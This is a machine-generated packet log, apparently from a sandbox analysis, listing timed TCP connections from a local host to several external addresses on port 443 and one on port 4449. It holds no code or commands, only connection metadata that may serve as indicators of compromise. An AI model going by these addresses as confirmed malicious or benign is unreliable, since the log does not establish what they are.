Jul 24, 2024 19:57:09.931808949 CEST	49775	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:09.931862116 CEST	443	49775	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:09.931894064 CEST	49775	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:09.931911945 CEST	443	49775	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:10.038633108 CEST	49776	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:10.038672924 CEST	443	49776	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:10.038764954 CEST	49776	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:10.040519953 CEST	49776	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:10.040534019 CEST	443	49776	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:10.693222046 CEST	443	49776	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:10.694159031 CEST	49776	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:10.696101904 CEST	49776	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:10.696110010 CEST	443	49776	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:10.696180105 CEST	49776	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:10.696192026 CEST	443	49776	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:10.696341991 CEST	49776	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:10.696346998 CEST	443	49776	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:10.696460962 CEST	443	49776	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:10.699640036 CEST	49776	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:10.699651957 CEST	443	49776	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:11.998816013 CEST	443	49776	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:11.998939991 CEST	443	49776	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:11.999017954 CEST	49776	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:12.017244101 CEST	49776	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:12.017280102 CEST	443	49776	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:12.017307997 CEST	49776	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:12.017316103 CEST	443	49776	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:12.132287979 CEST	49777	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:12.132318974 CEST	443	49777	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:12.132385969 CEST	49777	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:12.132837057 CEST	49777	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:12.132847071 CEST	443	49777	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:12.836157084 CEST	443	49777	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:12.836265087 CEST	49777	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:12.839500904 CEST	49777	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:12.839524031 CEST	443	49777	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:12.839584112 CEST	49777	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:12.839592934 CEST	443	49777	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:12.840353012 CEST	443	49777	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:12.840548992 CEST	49777	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:12.840562105 CEST	443	49777	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:13.392488956 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:13.702313900 CEST	443	49777	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:13.702421904 CEST	443	49777	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:13.702486038 CEST	49777	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:13.720886946 CEST	49777	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:13.720886946 CEST	49777	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:13.720912933 CEST	443	49777	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:13.720925093 CEST	443	49777	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:13.835397959 CEST	49778	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:13.835434914 CEST	443	49778	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:13.835508108 CEST	49778	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:13.835989952 CEST	49778	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:13.836004019 CEST	443	49778	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:14.611411095 CEST	443	49778	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:14.611519098 CEST	49778	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:14.614619017 CEST	49778	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:14.614629030 CEST	443	49778	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:14.615147114 CEST	49778	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:14.615151882 CEST	443	49778	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:14.615245104 CEST	443	49778	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:14.615459919 CEST	49778	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:14.615472078 CEST	443	49778	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:15.812211990 CEST	443	49778	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:15.812319994 CEST	443	49778	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:15.812387943 CEST	49778	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:15.838325024 CEST	49778	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:15.838325977 CEST	49778	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:15.838345051 CEST	443	49778	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:15.838355064 CEST	443	49778	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:15.946911097 CEST	49779	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:15.946942091 CEST	443	49779	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:15.947083950 CEST	49779	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:15.949243069 CEST	49779	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:15.949254990 CEST	443	49779	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:16.585741997 CEST	443	49779	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:16.585896015 CEST	49779	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:16.588505983 CEST	49779	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:16.588516951 CEST	443	49779	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:16.588623047 CEST	49779	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:16.588627100 CEST	443	49779	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:16.589349031 CEST	443	49779	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:16.589540005 CEST	49779	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:16.589555025 CEST	443	49779	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:17.047175884 CEST	49780	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:17.047266960 CEST	443	49780	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:17.047343016 CEST	49780	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:17.048650980 CEST	49780	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:17.048691034 CEST	443	49780	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:17.530956030 CEST	443	49780	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:17.531048059 CEST	49780	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:17.753464937 CEST	49780	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:17.753499031 CEST	443	49780	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:17.754447937 CEST	443	49780	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:17.788166046 CEST	443	49779	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:17.788249969 CEST	443	49779	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:17.788296938 CEST	49779	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:17.803508043 CEST	49780	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:17.807943106 CEST	49779	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:17.807960033 CEST	443	49779	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:17.807991028 CEST	49779	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:17.807996988 CEST	443	49779	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:17.881959915 CEST	49780	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:17.882008076 CEST	49780	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:17.882117033 CEST	443	49780	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:17.913690090 CEST	49781	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:17.913746119 CEST	443	49781	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:17.913806915 CEST	49781	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:17.914349079 CEST	49781	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:17.914361000 CEST	443	49781	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:18.343137980 CEST	443	49780	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:18.343374968 CEST	443	49780	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:18.343440056 CEST	49780	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:18.348231077 CEST	49780	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:18.348254919 CEST	443	49780	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:18.348278046 CEST	49780	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:18.348284006 CEST	443	49780	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:18.364948988 CEST	49782	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:18.364994049 CEST	443	49782	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:18.365050077 CEST	49782	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:18.365395069 CEST	49782	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:18.365405083 CEST	443	49782	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:18.594580889 CEST	443	49781	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:18.594671011 CEST	49781	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:18.597083092 CEST	49781	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:18.597094059 CEST	443	49781	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:18.597138882 CEST	49781	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:18.597145081 CEST	443	49781	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:18.597177982 CEST	49781	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:18.597182989 CEST	443	49781	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:18.597893953 CEST	443	49781	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:18.598109961 CEST	49781	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:18.598126888 CEST	443	49781	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:18.874958992 CEST	443	49782	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:18.875037909 CEST	49782	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:18.877243042 CEST	49782	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:18.877257109 CEST	443	49782	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:18.877490997 CEST	443	49782	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:18.878710985 CEST	49782	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:18.878731966 CEST	49782	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:18.878770113 CEST	443	49782	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:19.383115053 CEST	443	49782	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:19.383178949 CEST	443	49782	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:19.383207083 CEST	443	49782	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:19.383224964 CEST	49782	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:19.383239031 CEST	443	49782	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:19.383266926 CEST	443	49782	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:19.383280039 CEST	49782	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:19.383286953 CEST	443	49782	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:19.383320093 CEST	49782	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:19.383418083 CEST	443	49782	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:19.387073994 CEST	443	49782	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:19.387116909 CEST	443	49782	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:19.387118101 CEST	49782	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:19.387129068 CEST	443	49782	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:19.387166023 CEST	49782	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:19.387171984 CEST	443	49782	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:19.388011932 CEST	443	49782	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:19.388046026 CEST	49782	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:19.388051987 CEST	443	49782	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:19.431369066 CEST	49782	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:19.476999998 CEST	443	49782	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:19.477130890 CEST	443	49782	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:19.477191925 CEST	49782	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:19.478235960 CEST	443	49781	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:19.478296995 CEST	443	49781	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:19.478357077 CEST	49781	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:19.496455908 CEST	49781	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:19.496479034 CEST	443	49781	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:19.498878956 CEST	49782	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:19.498893976 CEST	443	49782	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:19.498910904 CEST	49782	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:19.498917103 CEST	443	49782	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:19.601032019 CEST	49783	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:19.601073027 CEST	443	49783	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:19.601131916 CEST	49783	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:19.601605892 CEST	49783	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:19.601614952 CEST	443	49783	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:20.220292091 CEST	443	49783	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:20.220366001 CEST	49783	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:20.224517107 CEST	49783	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:20.224531889 CEST	443	49783	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:20.224579096 CEST	49783	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:20.224584103 CEST	443	49783	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:20.224824905 CEST	443	49783	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:20.227463961 CEST	49783	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:20.272497892 CEST	443	49783	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:20.340375900 CEST	49784	4449	192.168.2.10	193.222.96.24
Jul 24, 2024 19:57:20.345446110 CEST	4449	49784	193.222.96.24	192.168.2.10
Jul 24, 2024 19:57:20.345593929 CEST	49784	4449	192.168.2.10	193.222.96.24
Jul 24, 2024 19:57:20.403049946 CEST	49784	4449	192.168.2.10	193.222.96.24
Jul 24, 2024 19:57:20.408168077 CEST	4449	49784	193.222.96.24	192.168.2.10
Jul 24, 2024 19:57:21.522912979 CEST	443	49783	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:21.523010015 CEST	443	49783	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:21.523077011 CEST	49783	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:21.542145014 CEST	49783	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:21.542176008 CEST	443	49783	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:21.542202950 CEST	49783	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:21.542210102 CEST	443	49783	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:21.543395042 CEST	49785	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:21.543428898 CEST	443	49785	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:21.543493986 CEST	49785	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:21.543890953 CEST	49785	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:21.543900967 CEST	443	49785	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:21.648387909 CEST	49786	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:21.648432970 CEST	443	49786	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:21.648618937 CEST	49786	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:21.649127007 CEST	49786	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:21.649142981 CEST	443	49786	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:22.094182014 CEST	443	49785	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:22.094260931 CEST	49785	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:22.097233057 CEST	49785	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:22.097239971 CEST	443	49785	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:22.097469091 CEST	443	49785	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:22.098702908 CEST	49785	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:22.098884106 CEST	49785	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:22.098906994 CEST	443	49785	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:22.284692049 CEST	443	49786	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:22.284811974 CEST	49786	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:22.287341118 CEST	49786	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:22.287348986 CEST	443	49786	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:22.287412882 CEST	49786	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:22.287420034 CEST	443	49786	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:22.287456989 CEST	49786	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:22.287461042 CEST	443	49786	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:22.288141966 CEST	443	49786	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:22.288722992 CEST	49786	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:22.336530924 CEST	443	49786	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:22.834201097 CEST	443	49785	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:22.834310055 CEST	443	49785	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:22.834356070 CEST	49785	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:22.834635019 CEST	49785	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:22.834650993 CEST	443	49785	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:23.561763048 CEST	49787	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:23.561817884 CEST	443	49787	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:23.561897993 CEST	49787	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:23.565191031 CEST	49787	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:23.565207958 CEST	443	49787	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:23.592602015 CEST	443	49786	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:23.592686892 CEST	443	49786	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:23.592732906 CEST	49786	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:23.612070084 CEST	49786	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:23.612106085 CEST	443	49786	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:23.612128019 CEST	49786	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:23.612135887 CEST	443	49786	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:23.726191044 CEST	49788	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:23.726246119 CEST	443	49788	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:23.726319075 CEST	49788	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:23.726811886 CEST	49788	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:23.726823092 CEST	443	49788	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:24.046499968 CEST	443	49787	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:24.046576977 CEST	49787	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:24.048111916 CEST	49787	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:24.048124075 CEST	443	49787	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:24.048351049 CEST	443	49787	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:24.049549103 CEST	49787	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:24.049722910 CEST	49787	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:24.049743891 CEST	443	49787	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:24.049798965 CEST	49787	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:24.049803972 CEST	443	49787	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:24.440309048 CEST	443	49788	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:24.440381050 CEST	49788	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:24.443351984 CEST	49788	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:24.443367958 CEST	443	49788	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:24.443422079 CEST	49788	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:24.443428040 CEST	443	49788	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:24.443475008 CEST	49788	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:24.443479061 CEST	443	49788	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:24.443892002 CEST	443	49788	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:24.444073915 CEST	49788	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:24.488497019 CEST	443	49788	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:24.551079988 CEST	443	49787	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:24.551184893 CEST	443	49787	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:24.551233053 CEST	49787	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:24.553184986 CEST	49787	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:24.553205967 CEST	443	49787	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:25.451900959 CEST	443	49788	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:25.451993942 CEST	443	49788	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:25.452043056 CEST	49788	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:25.478770971 CEST	49788	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:25.478800058 CEST	443	49788	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:25.585597992 CEST	49789	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:25.585653067 CEST	443	49789	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:25.585820913 CEST	49789	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:25.586231947 CEST	49789	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:25.586247921 CEST	443	49789	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:25.861939907 CEST	49790	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:25.862015009 CEST	443	49790	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:25.862096071 CEST	49790	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:25.862525940 CEST	49790	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:25.862540007 CEST	443	49790	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:26.229686975 CEST	443	49789	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:26.229773045 CEST	49789	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:26.232418060 CEST	49789	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:26.232429028 CEST	443	49789	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:26.232520103 CEST	49789	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:26.232525110 CEST	443	49789	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:26.232569933 CEST	49789	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:26.232575893 CEST	443	49789	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:26.232798100 CEST	443	49789	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:26.232948065 CEST	49789	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:26.232960939 CEST	443	49789	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:26.535904884 CEST	443	49790	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:26.536004066 CEST	49790	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:26.548444033 CEST	49790	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:26.548475981 CEST	443	49790	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:26.548784971 CEST	443	49790	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:26.550045013 CEST	49790	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:26.550185919 CEST	49790	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:26.550206900 CEST	443	49790	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:26.550271988 CEST	49790	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:26.550280094 CEST	443	49790	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:27.115875006 CEST	443	49790	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:27.116091013 CEST	443	49790	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:27.116167068 CEST	49790	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:27.173000097 CEST	49790	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:27.173043013 CEST	443	49790	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:27.510039091 CEST	443	49789	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:27.510127068 CEST	443	49789	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:27.511475086 CEST	49789	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:27.537889957 CEST	49789	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:27.537889957 CEST	49789	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:27.537924051 CEST	443	49789	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:27.537936926 CEST	443	49789	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:27.650871992 CEST	49791	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:27.650923014 CEST	443	49791	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:27.651036978 CEST	49791	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:27.651635885 CEST	49791	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:27.651645899 CEST	443	49791	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:28.293915033 CEST	443	49791	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:28.298156023 CEST	49791	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:28.301175117 CEST	49791	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:28.301187038 CEST	443	49791	107.173.160.139	192.168.2.10
